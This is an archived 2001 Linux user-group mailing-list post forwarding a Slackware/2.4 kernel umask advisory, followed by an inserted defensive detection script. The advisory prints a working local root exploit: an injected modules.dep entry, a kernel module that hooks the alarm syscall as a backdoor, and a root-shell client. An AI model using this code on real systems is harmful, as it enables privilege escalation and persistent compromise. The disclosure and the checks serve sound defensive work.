From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, July 16, 2001 10:53 PM
Subject: 2.4.x/Slackware Init script vulnerability
> I posted this to the linux kernel mailing list last Friday, July 13th 2001:
>
> Submitted by : Josh ([EMAIL PROTECTED]), lockdown ([EMAIL PROTECTED]) on July 16th, 2001
> Vulnerability : /lib/modules/2.4.5/modules.dep
> Tested On : Slackware 8.0, 2.4.5
> Local : Yes
> Remote : No
> Temporary Fix : umask 022 at the top of all your startup scripts
> Target : root
> Big thanks to : slider, lamagra, zen-parse
> Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
> cryptix, s0ttle, xphantom, qtip, tirancy, Loki, falcon-networks.com.
>
> The 2.4.x kernels starting with 2.4.3 (I think) have, after load, left a
> umask of 0000. This forces any files created in the bootup scripts, without
> the command `umask 022` issued, to be world writeable. In Slackware, files
> include /var/run/utmp and /var/run/gpm.pid. This same vulnerability is
> responsible for creating /lib/modules/`uname -r`/modules.dep world
> writeable. With this file world writeable, all an intruder need do is put
> something like the following in /lib/modules/`uname -r`/modules.dep,
> assuming the system's startup scripts modprobe lp:
>
> /lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o
>
> /tmp/alarm.o:
>
> where the alarm.o module is:
>
> #include <linux/config.h>
> #include <linux/module.h>
> #include <linux/version.h>
> #include <linux/types.h>
> #include <linux/sched.h>
> #include <linux/errno.h>
> #include <linux/fs.h>
> #include <linux/kernel.h>
> #include <asm/unistd.h>      /* __NR_alarm: the syscall number to hook */
>
> /* Linux 2.4 still exports sys_call_table, so a module can patch it. */
> extern void *sys_call_table[];
>
> asmlinkage unsigned int (*old_alarm)(unsigned int seconds);
>
> /* Replacement for sys_alarm: the magic argument 454 makes the calling
>  * process root; any other value is passed through to the real syscall. */
> asmlinkage unsigned int hacked_alarm(unsigned int seconds)
> {
>     if (seconds == 454) {
>         current->uid  = 0;
>         current->euid = 0;
>         current->gid  = 0;
>         current->egid = 0;
>         return 0;
>     }
>     return old_alarm(seconds);
> }
>
> int init_module(void)
> {
>     /* Save the real handler and install the hook. */
>     old_alarm = sys_call_table[__NR_alarm];
>     sys_call_table[__NR_alarm] = hacked_alarm;
>     return 0;
> }
>
> void cleanup_module(void)
> {
>     /* Restore the original handler on unload. */
>     sys_call_table[__NR_alarm] = old_alarm;
> }
>
> make a client:
> #include <stdio.h>
> #include <unistd.h>
>
> int main(void)
> {
>     /* The patched sys_alarm treats 454 as the trigger that sets uid 0. */
>     alarm(454);
>     execl("/bin/sh", "sh", (char *)NULL);
>     return 1; /* only reached if execl fails */
> }
>
> which will, when the module is loaded, execute a shell as root.
>
>
> And of course with /var/run/utmp writeable, users can delete or in other
> ways manipulate their logins as they appear in w/who/finger/getlogin(), etc.
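The post's root cause is that a startup script inherits a 0000 umask and so every file it creates is world-writable, and its payload works because modprobe follows whatever path modules.dep names. The following script is an added example, not code from the original post or from Slackware: it shows the effect of the inherited umask on a freshly created file, lists world-writable files under a tree (the check for /var/run and /lib/modules that the post implies), and scans a modules.dep for entries that point outside the module tree. The scratch paths and the sample modules.dep content are constructed for illustration.

```shell
#!/bin/sh
# Added example (not part of the original post): shows how the umask a
# startup script inherits decides the mode of every file it creates, and
# gives two checks for the symptom the post describes. Paths and the
# sample modules.dep content below are constructed for illustration.

# Create an empty file the way an init script would, under the given
# umask, and print its permission string (e.g. -rw-rw-rw-).
create_with_umask() {
    ( umask "$1"; : > "$2" )
    ls -ld "$2" | cut -c1-10
}

# List regular files under a directory that are writable by "other".
find_world_writable() {
    find "$1" -type f -perm -0002
}

# Constructed modules.dep in the 2.4 layout ("target: dep dep ..."),
# including the injected /tmp entry from the post.
sample_modules_dep() {
    cat <<'EOF'
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o
/tmp/alarm.o:
/lib/modules/2.4.5/kernel/drivers/char/parport.o:
EOF
}

# Print every module path (target or dependency) in a modules.dep file
# that does not live under the expected module tree, one per line.
suspicious_deps() {
    awk -v prefix="$2/" '
        NF == 0 { next }
        {
            for (i = 1; i <= NF; i++) {
                p = $i
                sub(/:$/, "", p)           # strip the colon from the target
                if (index(p, prefix) != 1) print p
            }
        }' "$1" | sort -u
}

# Stand-alone demonstration in a scratch directory.
work=$(mktemp -d)
echo "umask 0000: $(create_with_umask 0000 "$work/modules.dep")"
echo "umask 022:  $(create_with_umask 022 "$work/utmp")"
echo "world-writable files:"
find_world_writable "$work"
sample_modules_dep > "$work/modules.dep"
echo "entries outside /lib/modules/2.4.5:"
suspicious_deps "$work/modules.dep" /lib/modules/2.4.5
rm -rf "$work"
```

The umask demonstration prints `-rw-rw-rw-` for the file created under 0000 and `-rw-r--r--` under 022, which is exactly the difference the post's temporary fix makes. On a real system the two checks would be run as `find_world_writable /var/run` and `suspicious_deps /lib/modules/$(uname -r)/modules.dep /lib/modules/$(uname -r)`; any entry outside the module tree, or any world-writable modules.dep, is the condition the post describes.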
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]